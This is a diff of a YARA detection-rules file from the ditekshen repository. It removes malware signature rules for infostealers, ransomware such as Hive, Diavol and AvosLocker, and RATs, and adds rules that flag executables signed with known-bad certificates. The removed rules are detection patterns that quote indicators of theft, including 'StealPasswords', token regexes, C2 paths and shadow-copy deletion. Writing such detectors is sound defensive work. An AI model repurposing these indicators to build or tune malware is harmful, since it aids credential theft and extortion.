-		id = "2d0df2d8-5b1c-5408-b8c7-8ca14d57da0f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "fc3fd388-91f6-5f53-a284-4ef0a7d22290"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6541-L6551"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2261-L2272"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "10092e7916775fe0a39baa5714fdda89f443ceabdcc610cc1fcd5a0fb0e68d0c"
+		logic_hash = "9ef64774a0b6b11820321cd36d49213ad245cea82960aab99bb18e44a2ee79a8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "LOADER ERROR" fullword ascii
-		$s1 = "_ZN6curlpp10OptionBaseC2E10CURLoption" fullword ascii
-		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		thumbprint = "6256d3ca79330f7bd912a88e59f9a4f3bdebdcd6b9c55cda4e733e26583b3d61"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0085E1Af2Be0F380E5A5D11513Ddf45Fc6 : FILE
 {
 	meta:
-		description = "Detects coinmining malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1878a1b5-4e97-5575-802e-573caded2b3a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d55fd5ca-0e20-51de-84b6-f30dd2660529"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6553-L6571"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2274-L2285"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83760aef667819923a2ac67c006e03bb6d4260b7a4aedd691dd5b145fb50d5c1"
+		logic_hash = "5a86b9aecf7697bd8e1f40407934c6a9941714404a931b0f1bed4ae7440f6921"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%s/%s (Windows NT %lu.%lu" fullword ascii
-		$s2 = "\\Microsoft\\Libs\\WR64.sys" wide
-		$s3 = "\\\\.\\WinRing0_" wide
-		$s4 = "pool_wallet" ascii
-		$s5 = "cryptonight" ascii
-		$s6 = "mining.submit" ascii
-		$c1 = "stratum+ssl://" ascii
-		$c2 = "daemon+http://" ascii
-		$c3 = "stratum+tcp://" ascii
-		$c4 = "socks5://" ascii
-		$c5 = "losedaemon+https://" ascii
+		thumbprint = "e9849101535b47ff2a67e4897113c06f024d33f575baa5b426352f15116b98b4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $c* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Makke Digital Works" and pe.signatures [ i ] . serial == "00:85:e1:af:2b:e0:f3:80:e5:a5:d1:15:13:dd:f4:5f:c6" )
 }
-rule DITEKSHEN_MALWARE_Win_Mercurial : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02Aa497D39320Fc979Ad96160D90D410 : FILE
 {
 	meta:
-		description = "Detects Mercurial infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c262ada2-01ca-5fc1-adef-987908514019"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9387010e-94f5-5787-b30f-609d98c48ddf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6573-L6593"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2287-L2298"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "400f8f717a4e07bf4de508c02bbcd9e82bf21f3df84c989fc622378f33e192f0"
+		logic_hash = "762b1730c8cfcf5a89e49858723d5701c1fb958eb2cd4da5b240f21763cdabf8"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		thumbprint = "33e8e72a75d6f424c5a10d2b771254c07a7d9c138e5fea703117fe60951427ae"
+		importance = 20
 
-	strings:
-		$x1 = "mercurial grabber" wide nocase
-		$x2 = "\"text\":\"Mercurial Grabber |" wide
-		$x3 = "/nightfallgt/mercurial-grabber" wide
-		$s1 = "/LimerBoy/Adamantium-Thief/" ascii
-		$s2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" fullword wide
-		$s3 = "StealCookies" fullword ascii
-		$s4 = "StealPasswords" fullword ascii
-		$s5 = "DetectDebug" fullword ascii
-		$s6 = "CaptureScreen" fullword ascii
-		$s7 = "WebhookContent" fullword ascii
-		$s8 = /Grab(Token|Product|IP|Hardware)/ fullword ascii
-		$p1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword ascii wide
-		$p2 = "mfa\\.[\\w-]{84}" fullword ascii wide
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCHLESS GIFTS, INC." and pe.signatures [ i ] . serial == "02:aa:49:7d:39:32:0f:c9:79:ad:96:16:0d:90:d4:10" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_D0B094274C761F367A8Eaea08E1D9C8F : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "3683b66b-3dc0-5b89-be71-1e1267ef7de8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2300-L2311"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "5ce9be0bdd8350dd5a8ae8cf2447d1be6b34ee3abc5c19754c63ef03b7cccec9"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "e94a9d81c4a67ef953fdb27aad6ec8fa347e6903b140d21468066bdca8925bc5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( all of ( $p* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nsasoft US LLC" and pe.signatures [ i ] . serial == "d0:b0:94:27:4c:76:1f:36:7a:8e:ae:a0:8e:1d:9c:8f" )
 }
-rule DITEKSHEN_MALWARE_Win_Phonzy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D59A05955A4A421500F9561Ce983Aac4 : FILE
 {
 	meta:
-		description = "Detects specific downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d35f41e4-4633-5482-9ae4-79354463f1b9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "97c4e8fa-8d66-500f-a63f-fac84ad9e508"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6595-L6608"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2313-L2324"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "924e7674d76594314df1a32d38f19cee12a3ed49cdf5e153f98bb08a7634055c"
+		logic_hash = "9187dcdbf29e5119d90ede266a14c7e46f5050800a38c57fa86e957c885c1d60"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$ua1 = "User-Agent: Mozilla/5.0 (X11; Linux" wide
-		$s1 = "<meta name=\"keywords\" content=\"([\\w\\d ]*)\">" fullword wide
-		$s2 = "WebClient" fullword ascii
-		$s3 = "WriteAllText" fullword ascii
-		$s4 = "DownloadString" fullword ascii
-		$s5 = "WriteByte" fullword ascii
+		thumbprint = "7f56555ac8479d4e130a89e787b7ff2f47005cc02776cf7a30a58611748c4c2e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $ua* ) and ( $s1 ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" )
 }
-rule DITEKSHEN_MALWARE_Win_Hive : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_35590Ebe4A02Dc23317D8Ce47A947A9B : FILE
 {
 	meta:
-		description = "Detects Hive ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7b79dc54-01c7-5667-acf5-a32cd7a45b54"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "36630916-26df-5d2c-8faf-9fa2e240bff3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6610-L6647"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2326-L2337"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14c20ff2fa62d80eed0f4f364e24d93d493d4f3b47f664983714940afa74046f"
+		logic_hash = "c01f9ecb1e69f6d0cb8061930cda27469eb18be19c0471192b31d516cddf828f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$url1 = "http://hivecust" ascii
-		$url2 = "http://hiveleakdb" ascii
-		$s1 = "encrypt_files.go" ascii
-		$s2 = "erase_key.go" ascii
-		$s3 = "kill_processes.go" ascii
-		$s4 = "remove_shadow_copies.go" ascii
-		$s5 = "stop_services_windows.go" ascii
-		$s6 = "remove_itself_windows.go" ascii
-		$x1 = "/encryptor/" ascii
-		$x2 = "HOW_TO_DECRYPT.txt" ascii
-		$x3 = "FilesEncrypted" fullword ascii
-		$x4 = "EncryptionStarted" fullword ascii
-		$x5 = "encryptFilesGroup" fullword ascii
-		$x6 = "Your data will be undecryptable" ascii
-		$x7 = "- Do not fool yourself. Encryption has perfect secrecy" ascii
-		$v1_1 = ".EncryptFiles." ascii
-		$v1_2 = ".EncryptFilename." ascii
-		$v1_3 = ")*struct { F uintptr; .autotmp_14 string }" ascii
-		$v1_4 = "D*struct { F uintptr; data *[]uint8; seed *uint8; fnc *main.decFunc }" ascii
-		$v1_5 = "golang.org/x/sys/windows.getSystemWindowsDirectory" ascii
-		$v1_6 = "path/filepath.WalkDir" ascii
-		$v2_1 = "taskkill /f /im" ascii
-		$v2_2 = "schtasks /delete /tn" ascii
-		$v2_3 = "encfile.txt" ascii
-		$v2_4 = "README.html" ascii
-		$v2_5 = "total encrypt %v/%v" ascii
-		$v2_6 = "<b>ITSSHOWKEY</b>" ascii
-		$v2_7 = "Recovery your files." ascii
-		$v2_8 = "yaml:\"send_host\"" ascii
-		$v2_9 = "yaml:\"ignore_dir\"" ascii
+		thumbprint = "d9b60a67cf3c8964be1e691d22b97932d40437bfead97a84c1350a2c57914f28"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $url* ) or all of ( $s* ) or 4 of ( $x* ) or 5 of ( $v1* ) or 5 of ( $v2* ) or ( 4 of ( $v2* ) and #v2_1 > 10 ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" )
 }
-rule DITEKSHEN_MALWARE_Win_Spyro : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1F23F001458716D435Cca1A55D660Ec5 : FILE
 {
 	meta:
-		description = "Detects Spyro / VoidCrypt / Limbozar ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8b3273c4-827e-50ce-983e-a5843f6b5a78"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "16a904e4-bf1a-5530-9269-d92c0f1bb4d3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6649-L6675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2339-L2350"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2e3be361f6d4283fd312a4486eaa39d6594813937cc3f62dbb603babeff17929"
+		logic_hash = "3e91429f7b25ad54103ee230a36d4b51060adb458b533b9cbd00178a02676629"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Decrypt-info.txt" ascii wide
-		$s2 = "AbolHidden" ascii wide
-		$s3 = "C:\\ProgramData\\prvkey" ascii wide
-		$s4 = ".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP" ascii
-		$s5 = "C:\\Users\\LEGION\\" ascii
-		$s6 = "C:\\ProgramData\\pkey.txt" fullword ascii
-		$s7 = ".Spyro" fullword ascii
-		$m1 = "Go to C:\\ProgramData\\ or in Your other Drives" wide
-		$m2 = "saving prvkey.txt.key file will cause" wide
-		$m3 = "in Case of no Answer:" wide
-		$m4 = "send us prvkey*.txt.key" wide
-		$m5 = "Somerhing went wrong while writing payload on disk" ascii
-		$m6 = "this country is forbidden.\"}" ascii
-		$c1 = "Voidcrypt/1.0" ascii
-		$c2 = "h1dd3n.cc" ascii
-		$c3 = "/voidcrypt/index.php" ascii
-		$c4 = "&user=" ascii
-		$c5 = "&disk-size=" ascii
-		$c6 = "unique-id=" ascii
+		thumbprint = "934d9357b6fb96f7fb8c461dd86824b3eed5f44a65c10383fe0be742c8c9b60e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $c* ) or 3 of ( $m* ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" )
 }
-rule DITEKSHEN_MALWARE_Win_Darkvnc : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C2Fc83D458E653837Fcfc132C9B03062 : FILE
 {
 	meta:
-		description = "Detects DarkVNC"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3c7d215c-fcca-5a0f-b59c-d84fd894677a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "fbc9420d-4670-502f-af6a-13d17fb73938"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6677-L6696"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2352-L2363"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0dbde04c0a05e476d505b92cf7dbf3b4ef0dd9e88eafcd21b7a7d0e3623abbd"
+		logic_hash = "96ed5e78195f12cdc0316ed454ad4e2235253ed897905c4a97756b306933d874"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "USR-%s(%s)_%S-%S%u%u" fullword wide
-		$s2 = "BOT-%s(%s)_%S-%S%u%u" fullword wide
-		$s3 = "USR-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
-		$s4 = "BOT-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
-		$s5 = "PRM_STRG" fullword wide
-		$s6 = "bot_shell >" ascii
-		$s7 = "monitor_off / monitor_on" ascii
-		$s8 = "kbd_off / kbd_on" ascii
-		$s9 = "ActiveDll: Dll inject thread for process 0x%x terminated with status: %u" ascii
-		$s10 = "PsSup: File %s successfully started with parameter \"%s\"" ascii
-		$s11 = "PsSup: ShellExecute failed. File: %s, error %u" ascii
-		$s12 = "#hvnc" fullword ascii
+		thumbprint = "82294a7efa5208eb2344db420b9aeff317337a073c1a6b41b39dda549a94557e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" )
 }
-rule DITEKSHEN_MALWARE_Win_RSJON : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Fcb3D3519E66E5B6D90B8B595F558E81 : FILE
 {
 	meta:
-		description = "Detects RSJON / Ryzerlo / HiddenTear ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7cc3e863-b594-51a9-9d41-68021ce3b97c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "966650b5-d776-5ed0-a99b-507b46abd882"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6698-L6727"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2365-L2376"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "abfea2955bf0d0b0511ea820582cc15fbcfc38dbed71fb2a0050cd98a9311cda"
+		logic_hash = "62c7189cc906b9f2d2724492489218d9aecf08ef431463ebf1963b034222f2ad"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pdb1 = "C:\\Users\\brknc\\source\\repos\\" ascii
-		$pdb2 = "\\rs-jon\\obj\\Debug\\rs-jon.pdb" ascii
-		$pdb3 = "\\rs-jon\\obj\\Release\\rs-jon.pdb" ascii
-		$x1 = "READ_ME_PLZ.txt" wide
-		$x2 = "Files has been encrypted with rs-jon" wide
-		$x3 = ".rsjon" wide
-		$x4 = "bitcoins or kebab" wide
-		$x5 = /rs[-_]jon/ fullword ascii wide
-		$s1 = "SPIF_UPDATEINIFILE" fullword ascii
-		$s2 = "SPI_SETDESKWALLPAPER" fullword ascii
-		$s3 = "bytesToBeEncrypted" fullword ascii
-		$s4 = "SendPassword" fullword ascii
-		$s5 = "EncryptFile" ascii
-		$s6 = "fWinIni" fullword ascii
-		$s7 = "BTCAdress" fullword ascii
-		$s8 = "self_destruck" fullword ascii
-		$c1 = "?computer_name=" wide
-		$c2 = "&serialnumber=" wide
-		$c3 = "&password=" wide
-		$c4 = "&allow=ransom" wide
-		$c5 = "://darkjon.tk/" wide
-		$c6 = "/rnsm/write.php" wide
+		thumbprint = "8bf6e51dfe209a2ca87da4c6b61d1e9a92e336e1a83372d7a568132af3ad0196"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 6 of ( $s* ) or 4 of ( $c* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $pdb* ) and 1 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pegasun" and pe.signatures [ i ] . serial == "fc:b3:d3:51:9e:66:e5:b6:d9:0b:8b:59:5f:55:8e:81" )
 }
-rule DITEKSHEN_MALWARE_Win_Boxcaon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4B03Cabe6A0481F17A2Dbeb9Aefad425 : FILE
 {
 	meta:
-		description = "Detects IndigoZebra BoxCaon"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "becbde73-8b72-5e98-8684-87068ffff71b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3995296a-58ce-5615-8524-525698af3537"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6729-L6746"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2378-L2389"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f2f26e6678d49bfa5937511b1788a059ee10e1b5f19e53d6386199738a925a5"
+		logic_hash = "e3c0d68a65bc53b83a48310857605afda0004b4122201c18a66fea085a210924"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "<RetCMD null>" fullword wide
-		$s2 = "<txt null>" fullword wide
-		$s3 = "C:\\Users\\Public\\%d\\" fullword wide
-		$s4 = "api.dropboxapi.com" fullword wide
-		$s5 = "/2/files/upload" fullword wide
-		$ts1 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" ascii wide
-		$ts2 = "%s /A /C \"%s\" > %s" ascii wide
-		$ts3 = "ersInfo" ascii wide
-		$ts4 = "%svmpid%d.log" ascii wide
-		$ts5 = "%scscode%d.log" ascii wide
+		thumbprint = "2e86cb95aa7e4c1f396e236b41bb184787274bb286909b60790b98f713b58777"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of ( $ts* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" )
 }
-rule DITEKSHEN_MALWARE_Win_Avoslocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_539015999E304A5952985A994F9C3A53 : FILE
 {
 	meta:
-		description = "Hunt for AvosLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "390e57b2-207e-5013-899a-0b04aa63a56f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b53f5843-fb4c-5c61-be24-21bdbc445239"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6748-L6757"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2391-L2402"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "85601fdd13ddeb1fc0b8b98eb68e324046d60c1ae9467d083a75abebcb50e3a0"
+		logic_hash = "72304761de1d5e81659487947a1cfa017f7f41d5639f18634db4dfd094980518"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "GET_YOUR_FILES_BACK.txt" ascii wide
-		$s2 = ".avos" fullword ascii wide
+		thumbprint = "7731825aea38cfc77ba039a74417dd211abef2e16094072d8c2384af1093f575"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" )
 }
-rule DITEKSHEN_MALWARE_Win_Diavol : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_016836311Fc39Fbb8E6F308Bb03Cc2B3 : FILE
 {
 	meta:
-		description = "Detects Diavol ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df5cea04-505e-5009-b247-ba71b6d81ecc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "06cc9c38-c5a6-5311-8ceb-943ea3993fc7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6759-L6784"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2404-L2415"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bcc7a9dc2dcb12ded75af9d79ab0f46f0e69da9e9fe72539be6351306ed11c18"
+		logic_hash = "912d490ac5d746c584e4dd5639be98d9577faba215cc1f8ebdf360581be53d5c"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "README_FOR_DECRYPT.txt" ascii wide nocase
-		$s2 = ".lock64" fullword ascii wide
-		$s3 = "LockMainDIB" ascii wide
-		$s4 = "locker.divided" ascii wide
-		$s5 = "%tob_dic%/" wide
-		$s6 = "%cid_bot%" wide
-		$m1 = "GENBOTID" ascii wide
-		$m2 = "SHAPELISTS" ascii wide
-		$m3 = "REGISTER" ascii wide
-		$m4 = "FROMNET" ascii wide
-		$m5 = "SERVPROC" ascii wide
-		$m6 = "SMBFAST" ascii wide
-		$c1 = "/Bnyar8RsK04ug/" fullword ascii
-		$c2 = "/landing" fullword ascii
-		$c3 = "/wipe" fullword ascii
-		$c4 = "&ip_local1=111.111.111.111&ip_local2=222.222.222.222&ip_external=2.16.7.12" fullword ascii
-		$c5 = "&group=" fullword ascii
-		$c6 = "/BnpOnspQwtjCA/register" fullword ascii
+		thumbprint = "cab373e2d4672beacf4ca9c9baf75a2182a106cca5ea32f2fc2295848771a979"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or 4 of ( $c* ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" )
 }
-rule DITEKSHEN_MALWARE_Win_Margulasrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : FILE
 {
 	meta:
-		description = "Detects MargulasRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6efabf80-9194-542d-afd2-9bf9c8e26e55"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "deedbc3a-8c77-5c2c-b3c1-40e5d082ec5a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6786-L6810"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2417-L2428"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd5b94c947d97cdc34032f2cb84b4975a1e8f510638857fb6dbe553bcff7d16e"
+		logic_hash = "85efd10f6c49b93215c9f8f97915c62fb3ed3bb158b2137e953022b550263726"
